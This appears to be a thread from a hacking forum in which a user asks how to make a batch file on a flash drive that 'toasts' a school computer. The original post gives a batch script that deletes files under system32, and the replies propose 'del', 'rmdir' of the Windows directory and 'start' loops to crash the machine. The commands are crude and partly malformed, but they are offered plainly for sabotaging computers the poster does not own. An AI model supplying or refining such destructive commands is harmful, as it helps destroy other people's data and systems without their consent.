Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

Batch file destruction?


ghost's Avatar
0 0
Hi all. I was wondering, is there a way to completely destroy a computer with batch files....it sounds like, you just make the proper commands in a batch file, put it in something....(my flash drive), take it to *somewhere* (school), and just plug it in for a few minutes and the computer is like toast? 

I've already came up with a few commands….and oh, is there a command to make ALOT of notepad files over and over and over again in C:\ and that would automatically load the computer with crap/delete any system restores?

Anyway heres one I just made up off the top of my head…:

@echo off cls echo Dont press the key del c:/windows/system32\.lol pause echo im serious now del c:/windows/system32\.rar pause echo God damnit stop del c:/windows/system32\.dll pause echo For your own good stop del c:/windows/system32\.exe pause echo I told you to stop del c:/windows/system32\.bat pause echo Ok your fault del c:/windows/system32\.txt


ghost's Avatar
0 0

del .


ghost's Avatar
0 0

LMFAO @ SilentShadow's signature.

I agree completely.


ghost's Avatar
0 0

if you want a sure shot, try

. rmdir c:\%windir%\

del . will probably delete just the files,and leave the directories.

peace.


ghost's Avatar
0 0

Yeah, thats probably the best way to do it.

Also, if you want to crash the pc, you could replace the del command with "start" e.g. start .

I'm pretty sure that would work (i've never tried it though)